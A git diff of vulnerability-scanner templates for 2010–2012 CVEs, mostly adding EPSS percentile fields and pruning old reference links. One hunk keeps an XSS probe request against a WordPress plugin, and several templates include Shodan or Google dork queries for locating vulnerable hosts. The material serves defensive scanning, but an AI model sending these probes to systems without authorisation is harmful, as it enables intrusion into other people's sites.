@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: affiliatefeeds
diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml
index a4968faa69..d707f68994 100644
--- a/http/cves/2010/CVE-2010-1980.yaml
+++ b/http/cves/2010/CVE-2010-1980.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02401
cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:*
+ epss-percentile: 0.88504
metadata:
max-request: 1
vendor: roberto_aloi
diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml
index 2dadcf4575..8246b0db64 100644
--- a/http/cves/2010/CVE-2010-1981.yaml
+++ b/http/cves/2010/CVE-2010-1981.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00656
cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.76877
metadata:
max-request: 1
framework: joomla\!
diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml
index a3035e45ed..1335192d92 100644
--- a/http/cves/2010/CVE-2010-1982.yaml
+++ b/http/cves/2010/CVE-2010-1982.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/12121
- https://nvd.nist.gov/vuln/detail/CVE-2010-1982
- - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/
- - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00477
cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.72681
metadata:
max-request: 1
vendor: joomlart
diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml
index 4f76e50da3..0a026a15ca 100644
--- a/http/cves/2010/CVE-2010-1983.yaml
+++ b/http/cves/2010/CVE-2010-1983.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01815
cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:*
+ epss-percentile: 0.8667
metadata:
max-request: 1
vendor: redcomponent
diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml
index b885207246..d67c1bbacd 100644
--- a/http/cves/2010/CVE-2010-2033.yaml
+++ b/http/cves/2010/CVE-2010-2033.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2010-2033
- - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/
- - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: percha
diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml
index 14273b3928..c103d239ca 100644
--- a/http/cves/2010/CVE-2010-2034.yaml
+++ b/http/cves/2010/CVE-2010-2034.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00718
cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.78113
metadata:
max-request: 1
vendor: percha
diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml
index d7c6ef1cbd..eb96825282 100644
--- a/http/cves/2010/CVE-2010-2035.yaml
+++ b/http/cves/2010/CVE-2010-2035.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00718
cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:*
+ epss-percentile: 0.78113
metadata:
max-request: 1
vendor: percha
diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml
index 32338a27cf..a92402e547 100644
--- a/http/cves/2010/CVE-2010-2036.yaml
+++ b/http/cves/2010/CVE-2010-2036.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00718
cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.78113
metadata:
max-request: 1
vendor: percha
diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml
index b08f6315d0..ff9b32ffa6 100644
--- a/http/cves/2010/CVE-2010-2037.yaml
+++ b/http/cves/2010/CVE-2010-2037.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00718
cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.78113
metadata:
max-request: 1
vendor: percha
diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml
index afa6643c0f..82c5ba09d4 100644
--- a/http/cves/2010/CVE-2010-2045.yaml
+++ b/http/cves/2010/CVE-2010-2045.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: dionesoft
diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml
index 70bf23e240..2c7805e3e4 100644
--- a/http/cves/2010/CVE-2010-2050.yaml
+++ b/http/cves/2010/CVE-2010-2050.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03527
cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
+ epss-percentile: 0.90353
metadata:
max-request: 1
vendor: m0r0n
diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml
index 8034b4f47b..7cc6277ba9 100644
--- a/http/cves/2010/CVE-2010-2122.yaml
+++ b/http/cves/2010/CVE-2010-2122.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01806
cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:*
+ epss-percentile: 0.86643
metadata:
max-request: 1
vendor: joelrowley
diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml
index 385ffa3864..c658a8fe83 100644
--- a/http/cves/2010/CVE-2010-2128.yaml
+++ b/http/cves/2010/CVE-2010-2128.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01242
cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:*
+ epss-percentile: 0.83796
metadata:
max-request: 1
vendor: harmistechnology
diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml
index 9edc715cde..335e4e7f58 100644
--- a/http/cves/2010/CVE-2010-2259.yaml
+++ b/http/cves/2010/CVE-2010-2259.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: tamlyncreative
diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml
index 6a9e361b0e..c7cb85b9c2 100644
--- a/http/cves/2010/CVE-2010-2307.yaml
+++ b/http/cves/2010/CVE-2010-2307.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00832
cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:*
+ epss-percentile: 0.7986
metadata:
max-request: 1
vendor: motorola
diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml
index 6f99dcfd7e..d06a2801c0 100644
--- a/http/cves/2010/CVE-2010-2507.yaml
+++ b/http/cves/2010/CVE-2010-2507.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01671
cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86069
metadata:
max-request: 1
vendor: masselink
diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml
index 28ffb28449..fbc5620daa 100644
--- a/http/cves/2010/CVE-2010-2680.yaml
+++ b/http/cves/2010/CVE-2010-2680.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: harmistechnology
diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml
index 2b194116fe..2f2941a8f3 100644
--- a/http/cves/2010/CVE-2010-2682.yaml
+++ b/http/cves/2010/CVE-2010-2682.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: realtyna
diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml
index 1b13e60007..cce491629c 100644
--- a/http/cves/2010/CVE-2010-2857.yaml
+++ b/http/cves/2010/CVE-2010-2857.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: danieljamesscott
diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml
index 524e62f948..6d5aa6ab06 100644
--- a/http/cves/2010/CVE-2010-2861.yaml
+++ b/http/cves/2010/CVE-2010-2861.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-2861
cwe-id: CWE-22
- epss-score: 0.97295
+ epss-score: 0.97321
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99812
metadata:
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml
index 89eabf26a0..1e328aaef9 100644
--- a/http/cves/2010/CVE-2010-2918.yaml
+++ b/http/cves/2010/CVE-2010-2918.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-94
epss-score: 0.02847
cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*
+ epss-percentile: 0.89382
metadata:
max-request: 1
vendor: visocrea
diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml
index 82f82298e8..f8f9460613 100644
--- a/http/cves/2010/CVE-2010-2920.yaml
+++ b/http/cves/2010/CVE-2010-2920.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03527
cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.90353
metadata:
max-request: 1
vendor: foobla
diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml
index 5680273239..01383e6a55 100644
--- a/http/cves/2010/CVE-2010-3203.yaml
+++ b/http/cves/2010/CVE-2010-3203.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00626
cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76317
metadata:
max-request: 1
vendor: xmlswf
diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml
index 7b0ebdf427..f8ae87ea9a 100644
--- a/http/cves/2010/CVE-2010-3426.yaml
+++ b/http/cves/2010/CVE-2010-3426.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00826
cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:*
+ epss-percentile: 0.79783
metadata:
max-request: 1
vendor: 4you-studio
diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml
index e7f66b9469..38586f00a8 100644
--- a/http/cves/2010/CVE-2010-4231.yaml
+++ b/http/cves/2010/CVE-2010-4231.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2010-4231
cwe-id: CWE-22
- epss-score: 0.00822
+ epss-score: 0.01615
cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*
+ epss-percentile: 0.85862
metadata:
max-request: 1
vendor: camtron
diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml
index 284370fe61..372af6ec0b 100644
--- a/http/cves/2010/CVE-2010-4239.yaml
+++ b/http/cves/2010/CVE-2010-4239.yaml
@@ -10,13 +10,15 @@ info:
- https://www.openwall.com/lists/oss-security/2010/11/22/9
- https://security-tracker.debian.org/tracker/CVE-2010-4239
- https://nvd.nist.gov/vuln/detail/CVE-2010-4239
+ - https://access.redhat.com/security/cve/cve-2010-4239
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2010-4239
cwe-id: CWE-20
- epss-score: 0.01809
+ epss-score: 0.02543
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:*
+ epss-percentile: 0.88814
metadata:
max-request: 1
vendor: tiki
diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml
index 171ea60864..061e6be952 100644
--- a/http/cves/2010/CVE-2010-4282.yaml
+++ b/http/cves/2010/CVE-2010-4282.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01214
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83541
metadata:
max-request: 1
vendor: artica
diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml
index 4b5f13491a..8c54463c0a 100644
--- a/http/cves/2010/CVE-2010-4617.yaml
+++ b/http/cves/2010/CVE-2010-4617.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00938
cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.81097
metadata:
max-request: 1
vendor: kanich
diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml
index 037daf0dce..ceb14fd63a 100644
--- a/http/cves/2010/CVE-2010-4719.yaml
+++ b/http/cves/2010/CVE-2010-4719.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04503
cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91406
metadata:
max-request: 1
vendor: fxwebdesign
diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml
index 6d78595c9b..723d0c2698 100644
--- a/http/cves/2010/CVE-2010-4769.yaml
+++ b/http/cves/2010/CVE-2010-4769.yaml
@@ -8,8 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/15585
- https://nvd.nist.gov/vuln/detail/CVE-2010-4769
- - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/
- - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
@@ -18,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00949
cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.81213
metadata:
max-request: 1
vendor: janguo
diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml
index 87e7ffc844..c789fa5beb 100644
--- a/http/cves/2010/CVE-2010-4977.yaml
+++ b/http/cves/2010/CVE-2010-4977.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-4977
cwe-id: CWE-89
- epss-score: 0.00239
+ epss-score: 0.00199
cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.57091
metadata:
max-request: 1
vendor: miniwork
diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml
index 3c600f288a..189aad9643 100644
--- a/http/cves/2010/CVE-2010-5028.yaml
+++ b/http/cves/2010/CVE-2010-5028.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2010-5028
cwe-id: CWE-89
- epss-score: 0.01171
+ epss-score: 0.01052
cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82203
metadata:
max-request: 1
vendor: harmistechnology
diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml
index e3bacfe9cb..9cd416d74e 100644
--- a/http/cves/2010/CVE-2010-5278.yaml
+++ b/http/cves/2010/CVE-2010-5278.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2010-5278
cwe-id: CWE-22
- epss-score: 0.0469
+ epss-score: 0.04725
cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91601
metadata:
max-request: 1
vendor: modx
diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml
index d1f6dac332..f2e1dd1847 100644
--- a/http/cves/2010/CVE-2010-5286.yaml
+++ b/http/cves/2010/CVE-2010-5286.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04708
cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*
+ epss-percentile: 0.9159
metadata:
max-request: 1
vendor: joobi
diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml
index 3a1121c10d..734dfe6c9d 100644
--- a/http/cves/2011/CVE-2011-0049.yaml
+++ b/http/cves/2011/CVE-2011-0049.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96615
cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99457
metadata:
max-request: 1
vendor: mj2
diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml
index 14b2c92930..6eecee143f 100644
--- a/http/cves/2011/CVE-2011-1669.yaml
+++ b/http/cves/2011/CVE-2011-1669.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02966
cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.89572
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml
index 1166adb100..e5fdc764c0 100644
--- a/http/cves/2011/CVE-2011-2744.yaml
+++ b/http/cves/2011/CVE-2011-2744.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.8
cve-id: CVE-2011-2744
cwe-id: CWE-22
- epss-score: 0.01913
+ epss-score: 0.01541
cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85494
metadata:
max-request: 1
vendor: chyrp
diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml
index 277d5450e7..f3d1a3c33b 100644
--- a/http/cves/2011/CVE-2011-2780.yaml
+++ b/http/cves/2011/CVE-2011-2780.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 5
cve-id: CVE-2011-2780
cwe-id: CWE-22
- epss-score: 0.04076
+ epss-score: 0.03327
cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90099
metadata:
max-request: 1
vendor: chyrp
diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml
index 8bbde93741..40f8378e09 100644
--- a/http/cves/2011/CVE-2011-3315.yaml
+++ b/http/cves/2011/CVE-2011-3315.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2011-3315
cwe-id: CWE-22
- epss-score: 0.92426
+ epss-score: 0.90502
cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:*
+ epss-percentile: 0.98414
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml
index d2ebe41abd..ff4ccb75d0 100644
--- a/http/cves/2011/CVE-2011-4336.yaml
+++ b/http/cves/2011/CVE-2011-4336.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00182
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.54818
metadata:
max-request: 1
vendor: tiki
diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml
index 5e75f2940e..17dbb4c941 100644
--- a/http/cves/2011/CVE-2011-4618.yaml
+++ b/http/cves/2011/CVE-2011-4618.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2011-4618
cwe-id: CWE-79
- cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*
epss-score: 0.00746
+ cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.78598
metadata:
google-query: inurl:"/wp-content/plugins/advanced-text-widget"
max-request: 2
@@ -31,7 +32,6 @@ http:
- |
GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1
Host: {{Hostname}}
-
- |
GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml
index 471638e581..0fd8498e37 100644
--- a/http/cves/2011/CVE-2011-4624.yaml
+++ b/http/cves/2011/CVE-2011-4624.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2011-4624
cwe-id: CWE-79
- epss-score: 0.00427
+ epss-score: 0.00301
cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.65663
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml
index 80ffd86ac8..412a1f94a5 100644
--- a/http/cves/2011/CVE-2011-4804.yaml
+++ b/http/cves/2011/CVE-2011-4804.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.06953
cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93063
metadata:
max-request: 1
vendor: foobla
diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml
index 7d3019d37b..6e1ff30c8f 100644
--- a/http/cves/2011/CVE-2011-4926.yaml
+++ b/http/cves/2011/CVE-2011-4926.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2011-4926
cwe-id: CWE-79
- epss-score: 0.0083
+ epss-score: 0.01001
cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8173
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/adminimize/"
diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml
index c4bfe1ccc2..07d5a93bb9 100644
--- a/http/cves/2011/CVE-2011-5106.yaml
+++ b/http/cves/2011/CVE-2011-5106.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00541
cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.7437
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/"
diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml
index f3cc844eb4..d40037c7fa 100644
--- a/http/cves/2011/CVE-2011-5107.yaml
+++ b/http/cves/2011/CVE-2011-5107.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0022
cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:*
+ epss-percentile: 0.59193
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/alert-before-your-post"
diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml
index b05e7b900c..4e157103de 100644
--- a/http/cves/2011/CVE-2011-5179.yaml
+++ b/http/cves/2011/CVE-2011-5179.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0022
cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.59193
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/skysa-official/"
diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml
index 9d425d5705..cb9d6abcd4 100644
--- a/http/cves/2011/CVE-2011-5181.yaml
+++ b/http/cves/2011/CVE-2011-5181.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00326
cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.67061
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml
index 52d3dd4fa4..9b0df76c73 100644
--- a/http/cves/2011/CVE-2011-5252.yaml
+++ b/http/cves/2011/CVE-2011-5252.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2011-5252
cwe-id: CWE-20
- epss-score: 0.0304
+ epss-score: 0.02747
cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.8922
metadata:
max-request: 1
vendor: orchardproject
diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml
index 1d9c89e55e..7e0cce6880 100644
--- a/http/cves/2011/CVE-2011-5265.yaml
+++ b/http/cves/2011/CVE-2011-5265.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00432
cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:*
+ epss-percentile: 0.71357
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml
index 65aade183b..00a1e82825 100644
--- a/http/cves/2012/CVE-2012-0392.yaml
+++ b/http/cves/2012/CVE-2012-0392.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: NVD-CWE-noinfo
epss-score: 0.97059
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99651
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml
index a6f87cd4be..a54697a174 100644
--- a/http/cves/2012/CVE-2012-0394.yaml
+++ b/http/cves/2012/CVE-2012-0394.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-94
epss-score: 0.953
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99071
metadata:
max-request: 1
shodan-query: html:"Struts Problem Report"
diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml
index 74aeddee10..61bbd1076e 100644
--- a/http/cves/2012/CVE-2012-0896.yaml
+++ b/http/cves/2012/CVE-2012-0896.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
